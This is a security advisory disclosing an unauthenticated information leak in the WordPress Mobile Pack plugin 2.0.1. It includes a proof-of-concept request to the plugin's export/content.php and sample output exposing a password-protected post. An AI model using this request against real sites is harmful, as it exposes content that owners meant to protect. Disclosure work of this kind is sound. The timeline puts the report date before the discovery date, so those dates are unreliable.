Details ================ Software: WordPress Mobile Pack Version: 2.0.1 Homepage: http://wordpress.org/plugins/wordpress-mobile-pack/ Advisory report: https://security.dxw.com/advisories/information-disclosure-vulnerability-in-wordpress-mobile-pack-allows-anybody-to-read-password-protected-posts/ CVE: Awaiting assignment CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N) Description ================ Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts Vulnerability ================ WordPress Mobile Pack contains a PHP file which allows anybody – authenticated or otherwise – to read all public and password protected posts (draft and private posts appear not to be affected). Proof of concept ================ Create a password-protected post Enable WordPress Mobile Pack Visit http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x Your password-protected post is now visible to everybody in the form of JSON wrapped in “x()” Example output: x ( { \"articles\": [ { \"id\": 849, \"title\": \"Secret post\", \"timestamp\": 1406231170, \"author\": \"admin\", \"date\": \"Thu, Jul 24, 2014, 19:46\", \"link\": \"http://wp.local/?p=849\", \"image\": \"\", \"description\": \"

HUSH THIS IS A SECRET

n\", \"content\": \"\", \"category_id\": 1, \"category_name\": \"Uncategorized\" } ] } ) Mitigations ================ Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2014-07-24: Discovered 2014-07-13: Reported to developer via email 2014-08-19: Developer reported the issue fixed 2014-08-20: Advisory published Discovered by dxw: ================ Tom Adams Please visit security.dxw.com for more information.